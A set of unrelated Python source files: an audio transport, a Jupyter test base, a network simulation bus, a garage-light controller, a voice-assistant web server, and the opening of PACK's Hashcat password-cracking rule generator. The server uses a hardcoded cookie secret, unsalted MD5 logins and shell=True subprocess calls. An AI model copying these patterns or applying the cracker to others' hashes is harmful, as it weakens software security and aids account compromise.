:type sample: int
"""
t = sample / self.fs
if self.sequence and self.count == self.sequence[self.pos]:
self.pos = self.pos + 1
self.pos = self.pos % len(self.sequence)
self.count = 0
for event in self.events:
event.get_event(t)
self.count = self.count + 1
class GlobalTransport:
"""
:param event_handlers: An array of event handlers that should sync to this transport
:type event_handlers: array
:param input_device: The input device index. Can be found by running `python -m sounddevice` and selecting your desired device
:type input_device: int
:param output_device: The output device index. Can be found by running `python -m sounddevice` and selecting your desired device
:type output_device: int
:param channels: Number of channels the transport should have
:type channels: int
:param buffer_len: Audio buffer length of each channel
:type buffer_len: int
:param fs: Sampling frequency of the transport in Hz
:type fs: float
:ivar count: The current sample the transport is on
:vartype count: int
:ivar block: An array of audio data that will be output on the next buffer callback
:vartype block: array
:ivar chs: An array of node handlers that will be called for each channel
"""
def __init__(self, event_handlers, input_device=0, output_device=0, channels=2, buffer_len=1024, fs=48000.0):
sd.default.device = [input_device, output_device]
print("default device is: ", sd.default.device)
self.buffer_len = buffer_len
self.event_handlers = event_handlers
self.count = 0
self.block = []
for i in range(self.buffer_len):
self.block.append([0.0] * channels)
self.channels = channels
self.chs = []
for i in range(channels):
self.chs.append(NodeHandler([]))
self.fs = fs
self.need_block = False
def get_block(self):
"""Executed every time an audio buffer is needed
"""
self.block = []
for s in range(self.buffer_len):
sample = []
for ch in self.chs:
sample.append(ch.sample_callback(self.count))
for handler in self.event_handlers:
handler.sample_callback(self.count)
self.count = self.count + 1
self.block.append(sample)
def buffer_cb(self, indata, outdata, frames, timer, status):
outdata[:] = self.block
self.get_block()
def begin_thread(self):
while True:
with sd.Stream(channels=self.channels, samplerate=self.fs, blocksize=self.buffer_len, callback=self.buffer_cb):
sd.sleep(1000 * 60 * 60 * 24)
def start(self):
threading.Thread(target=self.begin_thread).start()
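# --- Illustrative usage sketch (not part of this module) -----------------------
# Hypothetical wiring of the classes above: a minimal sine-wave node is mixed by
# the NodeHandler of each channel of a GlobalTransport. The SineNode class and
# the device indices are assumptions made for illustration only.
class SineNode:
    def __init__(self, freq=440.0, amp=0.2):
        self.freq = freq
        self.amp = amp
    def get_sample(self, t):
        # Return one PCM sample for time t (in seconds), as expected by NodeHandler.
        return self.amp * np.sin(2.0 * np.pi * self.freq * t)

if __name__ == "__main__":
    transport = GlobalTransport(event_handlers=[], input_device=0, output_device=0)
    for ch in transport.chs:
        ch.add_node(SineNode(440.0))
    transport.start()  # opens an sd.Stream and fills buffers in a background thread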
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
from binascii import hexlify
from contextlib import contextmanager
import errno
import os
import sys
from threading import Thread, Event
import time
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
import requests
from tornado.ioloop import IOLoop
import zmq
import jupyter_core.paths
from traitlets.config import Config
from ..notebookapp import NotebookApp
from ..utils import url_path_join
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This creates some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def auth_headers(cls):
headers = {}
if cls.token:
headers['Authorization'] = 'token %s' % cls.token
return headers
@classmethod
def request(cls, verb, path, **kwargs):
"""Send a request to my server
with authentication and everything.
"""
headers = kwargs.setdefault('headers', {})
headers.update(cls.auth_headers())
response = requests.request(verb,
url_path_join(cls.base_url(), path),
**kwargs)
return response
@classmethod
def get_patch_env(cls):
return {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR' : cls.config_dir,
'JUPYTER_DATA_DIR' : cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
}
@classmethod
def get_argv(cls):
return []
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', cls.get_patch_env())
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=cls.get_argv())
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.stop()
cls.path_patch.stop()
cls.tmp_dir.cleanup()
# cleanup global zmq Context, to ensure we aren't leaving dangling sockets
def cleanup_zmq():
zmq.Context.instance().term()
t = Thread(target=cleanup_zmq)
t.daemon = True
t.start()
t.join(5) # give it a few seconds to clean up (this should be immediate)
# if term never returned, there's zmq stuff still open somewhere, so shout about it.
if t.is_alive():
raise RuntimeError("Failed to teardown zmq Context, open sockets likely left lying around.")
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
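# --- Illustrative usage sketch (not part of this module) -----------------------
# Hypothetical test case showing how NotebookTestBase is meant to be subclassed:
# it reuses the class-level notebook server plus the authenticated request()
# helper and the assert_http_error() context manager defined above. The chosen
# endpoints and file name are examples only.
class ExampleContentsAPITest(NotebookTestBase):
    def test_contents_root_is_reachable(self):
        # request() joins base_url() with the path and adds the token header.
        response = self.request('GET', 'api/contents')
        response.raise_for_status()
        self.assertEqual(response.status_code, 200)

    def test_missing_file_returns_404(self):
        with assert_http_error(404):
            response = self.request('GET', 'api/contents/no-such-file.ipynb')
            response.raise_for_status()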
|
Simulation.py
|
"""Simulation System for PiCN. The PiCN Simulation System consists of a Simulation Bus and Simulation Interfaces
The Simulation Bus is the dispatcher for different Simulation Interfaces. Each Simulation Interface has a unique address
which can be used as the identifier for a Face in the LinkLayer.
"""
import multiprocessing
import select
import threading
import time
from sys import getsizeof
from typing import Dict
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import BaseInterface
from PiCN.Layers.PacketEncodingLayer.Encoder import BasicEncoder, SimpleStringEncoder
class SimulationInterface(BaseInterface):
"""A Simulation Interface manages the communication between a PiCN Forwarder and the Simulation Bus
It can contain multiple parameter for packet loss or delay.
:param address: addr used by the interface
:param max_bandwidth: maximum bandwidth for the interface, 0 for no limit
:param delay_func: lambda-function, gets a packet as parameter and returns a delay value in seconds
:param packet_loss_func: gets a packet as parameter and returns if the packet was lost (true) or not (false)
"""
def __init__(self, address: str, max_bandwidth: int=0, delay_func=lambda packet: 0, packet_loss_func=lambda packet: False):
self._address = address
self.max_bandwidth = max_bandwidth #0 for infinite
self.delay = delay_func #delay function, returns a delay in seconds
self.packet_loss = packet_loss_func #False if packet is not lost
self.queue_from_bus = multiprocessing.Queue()
self.queue_from_linklayer = multiprocessing.Queue()
@property
def file_descriptor(self):
return self.queue_from_bus._reader
def send(self, data, addr, src = "relay"):
if src == "relay":
self.queue_from_linklayer.put([addr, data])
elif src == "bus":
self.queue_from_bus.put([addr, data])
def receive(self, dst = "relay", timeout=0):
if dst == "relay":
if timeout > 0:
data = self.queue_from_bus.get(timeout=timeout)
else:
data = self.queue_from_bus.get()
elif dst == "bus":
if timeout > 0:
data = self.queue_from_linklayer.get(timeout=timeout)
else:
data = self.queue_from_linklayer.get()
addr = data[0]
packet = data[1]
return (packet, addr)
def address(self):
return self._address
def close(self):
self.queue_from_linklayer.close()
self.queue_from_bus.close()
class SimulationBus(PiCNProcess):
"""Simulation Bus that dispatches the communication between nodes in a Simulation"""
def __init__(self, packetencoder: BasicEncoder=SimpleStringEncoder(), print_keep_alive=True):
self.interfacetable: Dict[str, SimulationInterface] = {}
self.packetencoder = packetencoder
self.print_keep_alive = print_keep_alive
def start_process(self):
self.process = multiprocessing.Process(target=self._run)
self.process.daemon = True
self.process.start()
def stop_process(self):
for iface in self.interfacetable.values():
iface.close()
if self.process:
self.process.terminate()
def _run(self):
"""Run the main loop of the Simulation Bus"""
time_interval = 3
data_amount = 0
timestamp = time.time()
while True:
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
fds = list(map((lambda x: x.queue_from_linklayer._reader), list(self.interfacetable.values())))
for fd in fds:
poller.register(fd, READ_ONLY)
ready_fds = poller.poll()
for fd in ready_fds:
interfaces = list(filter(lambda x: x.queue_from_linklayer._reader.fileno() == fd[0], self.interfacetable.values()))
try:
interface = interfaces[0]
except IndexError:
return
packet, dst_addr = interface.receive("bus")
src_addr = interface.address()
if dst_addr not in self.interfacetable:
continue
dec_packet = self.packetencoder.decode(packet)
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print(f"{time.time():.5f}" + "\tSending packet from\t'" + src_addr + "'\tto\t'" + dst_addr + "':\t'" +
str(type(dec_packet)).replace("class ","").replace("PiCN.Packets.", "") + "\t"+
str(dec_packet.name).replace("\n", " ") + "'" , end="") #TODO improve logging
dst_interface: SimulationInterface = self.interfacetable.get(dst_addr)
if dst_interface.packet_loss(packet):
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print("\t... LOST")
continue
if dst_interface.max_bandwidth > 0: #TODO check and improve that
t = time.time()
if timestamp + time_interval > t:
timestamp = time.time()
data_amount = 0
elif data_amount * 1/time_interval > dst_interface.max_bandwidth:
time.sleep(time_interval - (t - timestamp))
else:
data_amount += getsizeof(packet)
delay = dst_interface.delay(packet)
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print("\t(delay: " + str(delay) + ")")
#t = threading.Timer(delay, dst_interface.send, args=[packet, src_addr, "bus"])
#t.setDaemon(True)
#t.start()
time.sleep(delay)
dst_interface.send(packet, src_addr, "bus")
def add_interface(self, addr, max_bandwidth: int=0, delay_func=lambda packet: 0, packet_loss_func=lambda packet: False):
"""create a new interface given a addr and adds it to the
:param addr: address to be used for the interface
:param max_bandwidth: Maximum bandwith for the interface
:param delay_func: lambda-function, gets a packet as parameter and returns a delay value in seconds
:param packet_loss_func: gets a packet as parameter and returns if the packet was lost (true) or not (false)
:return: interface that was created.
"""
iface = SimulationInterface(addr, max_bandwidth=max_bandwidth, delay_func=delay_func, packet_loss_func=packet_loss_func)
self.interfacetable[addr] = iface
return self.interfacetable.get(addr)
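# --- Illustrative usage sketch (not part of this module) -----------------------
# Hypothetical setup of a SimulationBus with two interfaces: "nodeA" gets a fixed
# 10 ms delay, "nodeB" drops roughly 10 % of its packets. The addresses and the
# delay/loss lambdas are made up for illustration; forwarders would normally
# attach to these interfaces through their link layer.
if __name__ == "__main__":
    import random
    bus = SimulationBus()
    iface_a = bus.add_interface("nodeA", delay_func=lambda packet: 0.01)
    iface_b = bus.add_interface("nodeB", packet_loss_func=lambda packet: random.random() < 0.1)
    bus.start_process()
    # ... run the simulation, then shut the bus down again
    bus.stop_process()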
|
Light.py
|
from GarageBackend.Constants import *
from GarageBackend.ConfigManager import *
from nanpy import ArduinoApi, SerialManager
from time import sleep
from threading import Thread
import time
import datetime
import os, sys, traceback
import logging
log = logging.getLogger('Garage.Light')
class Light():
def __init__(self,lid,board_pin_id,garage_key, usbConnectHandler):
self.config_handler = ConfigManager()
self.light_id=lid
self.light_gname = garage_key
self.l_name=garage_key+"_" + lid
self.board_pin_id = board_pin_id
self.l_update_time = time.time()
self.usbConnectHandler = usbConnectHandler
self.status="OFF"
self.flashstatus="OFF"
strlog = "%s created (board pin %d)" % (self.l_name,board_pin_id)
log.info(strlog)
self.thread_light_flash = None
self.relayLOWEnableList=(self.config_handler.getConfigParam('GARAGE_COMMON', "GarageRelayLOWEnable")).split(',')
self.stop_thread = False
pass
def commandLight(self,cmd):
high=self.usbConnectHandler.HIGH
low=self.usbConnectHandler.LOW
#Handle those relays that are reversed
if (str(self.board_pin_id) in self.relayLOWEnableList):
high = self.usbConnectHandler.LOW
low = self.usbConnectHandler.HIGH
if (self.usbConnectHandler != None):
self.l_update_time = time.time()
if (cmd == "ON"):
self.usbConnectHandler.digitalWrite(self.board_pin_id, high)
else:
self.usbConnectHandler.digitalWrite(self.board_pin_id, low)
strlog = "%s %s Turn %s" % (self.l_name, self.light_id,cmd)
log.debug(strlog)
pass
def getLightStatus(self):
if self.flashstatus=="ON":
return "FLASH"
else:
return self.status
def turnOffLight(self):
self.status = "OFF"
self.commandLight(self.status)
def turnOnLight(self):
self.status = "ON"
self.commandLight(self.status)
def startFlashLight(self):
strlog = "%s %s Start Flashing" % (self.l_name, self.light_id)
log.debug(strlog)
self.stop_thread = False
self.flashstatus = "ON"
# light_manager=Light()
if (self.thread_light_flash == None):
self.thread_light_flash = Thread(target=self.flashLight,name=self.l_name,daemon=False)
strlog = "%s %s Start Thread Flashing" % (self.l_name, self.light_id)
log.debug(strlog)
else:
strlog = "%s %s Already flashing!" % (self.l_name, self.light_id)
log.debug(strlog)
return
try:
strlog = "%s %s Start Flashing thread start" % (self.l_name, self.light_id)
log.debug(strlog)
self.thread_light_flash.start()
except Exception:
strlog = "%s %s Start Flashing thread Eception. Already started ?" % (self.l_name, self.light_id)
log.debug(strlog)
def stopFlashLight(self):
strlog = "%s %s Stop Flashing" % (self.l_name, self.light_id)
self.flashstatus = "OFF"
log.debug(strlog)
self.stop_thread = True
if (self.thread_light_flash == None):
return
try:
self.stop_thread = True
self.thread_light_flash.join()
self.thread_light_flash = None
strlog = "%s %s Stop Flashing AFTER thread join" % (self.light_gname, self.light_id)
log.debug(strlog)
except Exception:
self.thread_light_flash = None
strlog = "%s %s Stop Flashing Exception" % (self.l_name, self.light_id)
log.debug(strlog)
traceback.print_exc()
def monitor(self):
pass
def flashLight(self):
crazyloop = 0
while (self.stop_thread == False
and crazyloop<150): #2 sec loop
strlog = "%s %s flashing Light !" % (self.l_name, self.light_id)
log.debug(strlog)
crazyloop+=1
if self.stop_thread == False: #Skip flash on thread stop
sleep(1.000)
if (self.status == "OFF" and self.stop_thread == False):
self.commandLight("ON")
else:
self.commandLight("OFF")
sleep(1.000)
self.commandLight(self.status)
self.stop_thread = True
# self.thread_light_flash = None
def connectUSB(self,usbConnectHandler):
strlog = "%s %s Re-connect USB (board pin %d) !" % (self.l_name, self.light_id, self.board_pin_id)
log.info(strlog)
self.usbConnectHandler = usbConnectHandler
# threading.Thread has no stop(); signal the flash loop to exit via the stop flag instead
self.stop_thread = True
self.thread_light_flash = Thread(target=Light.flashLight,
args=(self,), name=self.l_name,
daemon=True)
# self.initBoardPinModeOutput(self.board_pin_id)
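# --- Illustrative usage sketch (not part of this module) -----------------------
# Hypothetical wiring of a Light with a stand-in for the nanpy ArduinoApi handler
# (commandLight only needs digitalWrite/HIGH/LOW). A real GarageBackend
# configuration must still be available for ConfigManager() to resolve
# "GarageRelayLOWEnable"; everything below is illustration only.
class _FakeArduino:
    HIGH, LOW = 1, 0
    def digitalWrite(self, pin, value):
        print("pin %d <- %d" % (pin, value))

if __name__ == "__main__":
    light = Light(lid="L1", board_pin_id=7, garage_key="garage_main", usbConnectHandler=_FakeArduino())
    light.turnOnLight()
    light.startFlashLight()   # flashes in a background thread
    sleep(3)
    light.stopFlashLight()
    light.turnOffLight()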
|
server.py
|
import json
from datetime import timedelta
from robot import config, utils, logging, constants, Updater
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
from tornado.websocket import WebSocketHandler
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch()
suggestion = random.choice(suggestions)
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion)
else:
self.render('index.html', history=[])
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query, uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
p = subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
yaml.safe_load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except Exception:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret" : b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler)
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
host = config.get('/server/host', '0.0.0.0')
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
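# --- Illustrative note on the login check (not part of this module) ------------
# LoginHandler accepts a login when md5(password) equals the configured
# '/server/validate' value, and the same value is then stored in the
# "validation" cookie. A minimal sketch of deriving such a value (the example
# password is made up):
if __name__ == "__main__":
    example_password = 'wukong-demo'
    print(hashlib.md5(example_password.encode('utf-8')).hexdigest())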
|
rulegen.py
|
#!/usr/bin/env python3
# Rulegen.py - Advanced automated password rule and wordlist generator for the
# Hashcat password cracker using the Levenshtein Reverse Path
# algorithm and Enchant spell checking library.
#
# This tool is part of PACK (Password Analysis and Cracking Kit)
#
# VERSION 0.0.5
#
# Copyright (C) 2013 Peter Kacherginsky
# All rights reserved.
#
# Please see the attached LICENSE file for additional licensing information.
import re
import sys
import time
import enchant
import multiprocessing
import subprocess
from collections import Counter
from optparse import OptionParser, OptionGroup
from tqdm import tqdm
VERSION = "0.0.5"
# Testing rules with hashcat --stdout
HASHCAT_PATH = "hashcat/"
# Newline constant for use in f-strings
NEWLINE = "\r\n"
# Rule Generator class responsible for the complete cycle of rule generation
class RuleGen:
# Initialize Rule Generator class
def __init__(
self,
language,
providers="aspell,myspell",
basename="analysis",
threads=multiprocessing.cpu_count(),
):
self.threads = threads
self.enchant_broker = enchant.Broker()
self.enchant_broker.set_ordering("*", providers)
self.enchant = enchant.Dict(language, self.enchant_broker)
# Output options
self.basename = basename
# Finetuning word generation
self.max_word_dist = 10
self.max_words = 10
self.more_words = False
self.simple_words = False
# Finetuning rule generation
self.max_rule_len = 10
self.max_rules = 10
self.more_rules = False
self.simple_rules = False
self.brute_rules = False
# Debugging options
self.verbose = False
self.debug = False
self.word = None # Custom word to use.
self.quiet = False
#######################################################################
# Word and Rule Statistics
self.numeric_stats_total = 0
self.special_stats_total = 0
self.foreign_stats_total = 0
#######################################################################
# Preanalysis Password Patterns
self.password_pattern = dict()
self.password_pattern["insertion"] = re.compile(
"^[^a-z]*(?P<password>.+?)[^a-z]*$", re.IGNORECASE
)
self.password_pattern["email"] = re.compile(
r"^(?P<password>.+?)@[A-Z0-9.-]+\.[A-Z]{2,4}", re.IGNORECASE
)
self.password_pattern["alldigits"] = re.compile(r"^(\d+)$", re.IGNORECASE)
self.password_pattern["allspecial"] = re.compile(
"^([^a-z0-9]+)$", re.IGNORECASE
)
#######################################################################
# Hashcat Rules Engine
self.hashcat_rule = dict()
######################
# Dummy rule #
######################
# Do nothing
self.hashcat_rule[":"] = lambda x: x
######################
# Case rules #
######################
# Lowercase all letters
self.hashcat_rule["l"] = lambda x: x.lower()
# Capitalize all letters
self.hashcat_rule["u"] = lambda x: x.upper()
# Capitalize the first letter
self.hashcat_rule["c"] = lambda x: x.capitalize()
# Lowercase the first found character, uppercase the rest
self.hashcat_rule["C"] = lambda x: x[0].lower() + x[1:].upper()
# Toggle the case of all characters in word
self.hashcat_rule["t"] = lambda x: x.swapcase()
# Toggle the case of characters at position N
self.hashcat_rule["T"] = lambda x, y: x[:y] + x[y].swapcase() + x[y + 1 :]
# Upper case the first letter and every letter after a space
self.hashcat_rule["E"] = lambda x: " ".join(
[i[0].upper() + i[1:] for i in x.split(" ")]
)
######################
# Rotation rules #
######################
# Reverse the entire word
self.hashcat_rule["r"] = lambda x: x[::-1]
# Rotate the word left
self.hashcat_rule["{"] = lambda x: x[1:] + x[0]
# Rotate the word right
self.hashcat_rule["}"] = lambda x: x[-1] + x[:-1]
######################
# Duplication rules #
######################
# Duplicate entire word
self.hashcat_rule["d"] = lambda x: x + x
# Duplicate entire word N times
self.hashcat_rule["p"] = lambda x, y: x * y
# Duplicate word reversed
self.hashcat_rule["f"] = lambda x: x + x[::-1]
# Duplicate first character N times
self.hashcat_rule["z"] = lambda x, y: x[0] * y + x
# Duplicate last character N times
self.hashcat_rule["Z"] = lambda x, y: x + x[-1] * y
# Duplicate every character
self.hashcat_rule["q"] = lambda x: "".join([i + i for i in x])
# Duplicate first N characters
self.hashcat_rule["y"] = lambda x, y: x[:y] + x
# Duplicate last N characters
self.hashcat_rule["Y"] = lambda x, y: x + x[-y:]
######################
# Cutting rules #
######################
# Delete first character
self.hashcat_rule["["] = lambda x: x[1:]
# Delete last character
self.hashcat_rule["]"] = lambda x: x[:-1]
# Deletes character at position N
self.hashcat_rule["D"] = lambda x, y: x[:y] + x[y + 1 :]
# Truncate word at position N
self.hashcat_rule["'"] = lambda x, y: x[:y]
# Delete M characters, starting at position N
self.hashcat_rule["O"] = lambda x, y, z: x[:y] + x[y + z :]
# Extracts M characters, starting at position N (hashcat rule "x"; previously this reused "'" and shadowed the truncate rule)
self.hashcat_rule["x"] = lambda x, y, z: x[y : y + z]
# Purge all instances of X
self.hashcat_rule["@"] = lambda x, y: x.replace(y, "")
######################
# Insertion rules #
######################
# Append character to end
self.hashcat_rule["$"] = lambda x, y: x + y
# Prepend character to front
self.hashcat_rule["^"] = lambda x, y: y + x
